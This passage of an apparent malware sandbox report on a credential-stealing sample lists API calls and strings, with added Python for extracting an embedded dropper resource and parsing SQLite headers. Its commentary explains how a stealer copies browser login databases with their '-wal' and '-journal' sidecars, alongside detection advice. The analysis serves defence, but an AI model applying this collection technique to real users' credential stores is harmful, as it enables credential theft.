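    """IMAGE_RESOURCE_DIR_STRING_U: u16 length, then UTF-16LE code units."""
    (n,) = struct.unpack_from("<H", res, off)
    return res[off + 2: off + 2 + 2 * n].decode("utf-16-le")


def walk_resources(res: bytes, res_rva: int, dir_off: int = 0, path=()):
    """Yield (path, data_rva, size) for every leaf under the directory at
    dir_off. res is the raw .rsrc section, res_rva its virtual address; path
    elements are ints (IDs) or str (names), e.g. ("BIN", 50, 1033)."""
    n_named, n_id = struct.unpack_from("<HH", res, dir_off + 12)
    for i in range(n_named + n_id):
        ent = dir_off + 16 + 8 * i
        name_field, data_field = struct.unpack_from("<II", res, ent)
        key = (_read_name(res, name_field & 0x7FFFFFFF)
               if name_field & NAME_IS_STRING else name_field)
        if data_field & DATA_IS_DIRECTORY:
            yield from walk_resources(res, res_rva,
                                      data_field & 0x7FFFFFFF, path + (key,))
        else:
            # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData (an RVA), Size, CodePage, Reserved
            data_rva, size = struct.unpack_from("<II", res, data_field)
            yield path + (key,), data_rva, size


def _same(a, b) -> bool:
    # FindResource compares string names case-insensitively and IDs exactly.
    if isinstance(a, str) and isinstance(b, str):
        return a.casefold() == b.casefold()
    return a == b


def find_resource(res: bytes, res_rva: int, rtype, name):
    """Return the bytes of the first leaf matching (rtype, name) in any
    language, or None. Only data lying inside the .rsrc section itself is
    resolved, which is where linkers place resource payloads."""
    for path, data_rva, size in walk_resources(res, res_rva):
        if len(path) >= 2 and _same(path[0], rtype) and _same(path[1], name):
            off = data_rva - res_rva
            if 0 <= off and off + size <= len(res):
                return res[off: off + size]
    return None


def build_rsrc(rtype: str, name: int, lang: int, blob: bytes,
               res_rva: int = 0x3000) -> bytes:
    """Constructed test input (assumed layout, not taken from the sample): a
    minimal .rsrc section holding one resource whose type is a string and
    whose name and language are IDs. Fixed offsets: root dir @0, type dir @24,
    name dir @48, data entry @72, type string @88, blob right after it."""
    TYPE_DIR, NAME_DIR, DATA_ENT, STR_OFF = 24, 48, 72, 88
    blob_off = STR_OFF + 2 + 2 * len(rtype)

    def one_entry_dir(key, target):
        named = isinstance(key, str)
        hdr = struct.pack("<IIHHHH", 0, 0, 0, 0, int(named), int(not named))
        key_field = (NAME_IS_STRING | STR_OFF) if named else key
        return hdr + struct.pack("<II", key_field, target)

    out = one_entry_dir(rtype, DATA_IS_DIRECTORY | TYPE_DIR)
    out += one_entry_dir(name, DATA_IS_DIRECTORY | NAME_DIR)
    out += one_entry_dir(lang, DATA_ENT)
    out += struct.pack("<IIII", res_rva + blob_off, len(blob), 0, 0)
    out += struct.pack("<H", len(rtype)) + rtype.encode("utf-16-le")
    return out + blob
```

On a real file, take the raw bytes and VirtualAddress of the section that holds the resource data directory and call find_resource(section_bytes, section_rva, "BIN", 50); the returned buffer is what the memcpy at 0040B60D copies, and it is the first thing to hash and inspect when triaging a dropper of this kind.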
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00411AF6
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • wcsrchr.MSVCRT ref: 00411B14
                                                                                            • wcscat.MSVCRT ref: 00411B2E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                            • String ID: AE$.cfg$General$EA
                                                                                            • API String ID: 776488737-1622828088
                                                                                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040D8BD
                                                                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                            • memset.MSVCRT ref: 0040D906
                                                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                            • String ID: sysdatetimepick32
                                                                                            • API String ID: 1028950076-4169760276
                                                                                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                            • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                            • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                            • memset.MSVCRT ref: 0041BA3D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: -journal$-wal
                                                                                            • API String ID: 438689982-2894717839
                                                                                            • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                            • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
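The memcpy calls above build three names from one base path: the path itself, then the path with "-journal" (8 bytes) appended, then with "-wal" (4 bytes) appended. That is the sidecar naming SQLite uses for its rollback journal and write-ahead log, and copying all three is how a stealer takes a SQLite-backed credential store without losing rows that have only been written to the WAL. The following Python is an added example, not code from the report or from the sample: it reads the SQLite file header to tell which journaling mode a database is in, derives the expected size of the main file so a copy can be validated, and lists the sidecar that actually carries data. The header bytes it tests against are constructed inline.

```python
import struct

# Added example (not from the Joe Sandbox report or the sample): a reader for
# the 100-byte SQLite 3 file header, used to decide which "-journal" / "-wal"
# sidecar a collected database needs and to sanity-check the main file size.

SQLITE_MAGIC = b"SQLite format 3\x00"


def parse_sqlite_header(header: bytes) -> dict:
    """Decode the header fields that matter for collection.
    Returns {} if the bytes are not a SQLite 3 database."""
    if len(header) < 100 or header[:16] != SQLITE_MAGIC:
        return {}
    page_size, write_ver, read_ver = struct.unpack_from(">HBB", header, 16)
    if page_size == 1:              # the header encodes 65536 as 1
        page_size = 65536
    change_counter, page_count = struct.unpack_from(">II", header, 24)
    (version_valid_for,) = struct.unpack_from(">I", header, 92)
    return {
        "page_size": page_size,
        # file-format write version: 2 = WAL journaling, 1 = legacy rollback journal
        "journal_mode": "wal" if write_ver == 2 else "rollback",
        "read_version": read_ver,
        # the in-header page count is only trustworthy when it was written by
        # the same transaction that last bumped the change counter
        "page_count": page_count if version_valid_for == change_counter else None,
    }


def expected_main_file_size(header: bytes):
    """Size the main database file should have; None if it cannot be derived."""
    info = parse_sqlite_header(header)
    if not info or info["page_count"] is None:
        return None
    return info["page_size"] * info["page_count"]


def sidecar_files(db_path: str, header: bytes) -> list:
    """Files a copy must include to be consistent. In WAL mode committed pages
    not yet checkpointed live in "-wal"; in rollback mode a hot "-journal"
    holds the pre-transaction pages needed to open the file cleanly. The
    sample appends both suffixes unconditionally; a collector can pick by mode."""
    info = parse_sqlite_header(header)
    if not info:
        return []
    files = [db_path]
    if info["journal_mode"] == "wal":
        files.append(db_path + "-wal")
    else:
        files.append(db_path + "-journal")
    return files


def make_header(page_size: int = 4096, write_ver: int = 2, pages: int = 10) -> bytes:
    """Constructed 100-byte header for offline testing; not a real database."""
    h = bytearray(100)
    h[:16] = SQLITE_MAGIC
    struct.pack_into(">HBB", h, 16,
                     1 if page_size == 65536 else page_size, write_ver, write_ver)
    struct.pack_into(">II", h, 24, 7, pages)   # change counter 7, page count
    struct.pack_into(">I", h, 92, 7)           # version-valid-for == change counter
    return bytes(h)
```

For detection the useful consequence is the reverse of what the sample does: a process that is not the browser opening "<profile>\Login Data-wal" or "<profile>\Login Data-journal" alongside the main file is a strong signal, because only a reader that wants every committed row bothers with the sidecars.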
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Dialog$MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3975816621-0
                                                                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                            APIs
                                                                                            • _wcsicmp.MSVCRT ref: 00444D09
                                                                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                            • _wcsicmp.MSVCRT ref: 00444D33
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp$wcslen$_memicmp
                                                                                            • String ID: .save$http://$https://$log profile$signIn
                                                                                            • API String ID: 1214746602-2708368587
                                                                                            • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                            • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                            • memset.MSVCRT ref: 00405E33
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                            • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                            • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                            • String ID:
                                                                                            • API String ID: 2313361498-0
                                                                                            • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                            • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                            • GetWindow.USER32(00000000), ref: 00405F80
                                                                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ItemMessageRectSend$Client
                                                                                            • String ID:
                                                                                            • API String ID: 2047574939-0
                                                                                            • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                            • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                            APIs
                                                                                            • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                            • GetTickCount.KERNEL32 ref: 0041887D
                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                            • String ID:
                                                                                            • API String ID: 4218492932-0
                                                                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                            APIs
                                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                            • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: gj
                                                                                            • API String ID: 438689982-4203073231
                                                                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                            • API String ID: 3510742995-2446657581
                                                                                            • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                            • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                            • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                            • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                            • memset.MSVCRT ref: 00405ABB
                                                                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                            • SetFocus.USER32(?), ref: 00405B76
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$FocusItemmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4281309102-0
                                                                                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfwcscat
                                                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                            • API String ID: 384018552-4153097237
                                                                                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                            • String ID: 0$6
                                                                                            • API String ID: 2029023288-3849865405
                                                                                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                            APIs
                                                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                            • memset.MSVCRT ref: 00405455
                                                                                            • memset.MSVCRT ref: 0040546C
                                                                                            • memset.MSVCRT ref: 00405483
                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$memcpy$ErrorLast
                                                                                            • String ID: 6$\
                                                                                            • API String ID: 404372293-1284684873
                                                                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesErrorFileLastSleep$free
                                                                                            • String ID:
                                                                                            • API String ID: 1470729244-0
                                                                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                            APIs
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                                                            • wcscpy.MSVCRT ref: 0040A107
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1331804452-0
                                                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                            APIs
                                                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                            Memory Dump Source
